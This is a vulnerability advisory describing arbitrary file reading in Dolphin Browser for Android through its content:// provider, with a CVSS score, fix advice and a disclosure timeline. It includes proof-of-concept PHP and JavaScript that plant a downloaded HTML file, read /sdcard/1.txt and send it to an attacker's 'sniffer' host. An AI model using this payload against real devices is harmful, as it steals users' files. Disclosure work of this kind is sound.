PT-2012-60: Arbitrary File Reading in Dolphin Browser Vulnerable softwareDolphin Browser Version: 9.0.3 and earlierApplication link: http://dolphin-browser.com/Severity levelSeverity level: Medium Impact: Arbitrary File Reading Access Vector: Remote CVSS v2: Base Score: 5.8 Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:P)CVE: not assigned Software descriptionDolphin Browser is a powerful, quick and elegant browser for Android 2.0+Vulnerability descriptionThe specialists of the Positive Research center have detected Remote Arbitrary File Reading vulnerability in Dolphin Browser.The vulnerability exists because of incorrect content:// wrapper processing that allows you to remotely address the available content provider. Therefore the attacker can view /sdcard/1.txt file contents if the victim follows content://mobi.mgeek.TunnyBrowser.htmlfileprovider/sdcard/1.txt link. The attack is simply implemented. 1. A victim follows a link to the web site with the following PHP code:<? echo "<body onload=\"setTimeout('window.location=\'1day.php\'',1000);setTimeout('window.location=\'content://mobi.mgeek.TunnyBrowser.htmlfileprovider/sdcard/download/test.html\'',5000);\">"; ?>2. Browser automatically loads 1day.php page with the following code:<? header('Content-Disposition: attachment; filename="test.html"'); ?> <iframe src="content://mobi.mgeek.TunnyBrowser.htmlfileprovider/sdcard/1.txt"></iframe> <script> window.onload = function () { file = document.getElementsByTagName('iframe')[0].contentWindow.document.body.innerHTML; img = new Image(); img.src = 'http://oursniffer/sniff.php?data='+file; } </script>3. Then the user presses "Save" button, and the exploit now is located here: /sdcard/download/test.html 4. Then we forward the user to this file (content://mobi.mgeek.TunnyBrowser.htmlfileprovider/sdcard/download/test.html) via a link and the code is executed. 7. Data from /sdcard/1.txt file is written into the sniffer's log.How to fixUpdate your software up to the latest version.Advisory status18.12.2012 - Vendor is notified 18.12.2012 - Vendor gets vulnerability details 05.02.2013 - Vendor releases fixed version and details 07.03.2013 - Public disclosureCreditsThe vulnerabilities has discovered by Mikhail Firstov, Positive Research Center (Positive Technologies Company)Referenceshttp://en.securitylab.ru/lab/PT-2012-60 Reports on the vulnerabilities previously discovered by Positive Research:http://ptsecurity.com/research/advisory/ http://en.securitylab.ru/lab/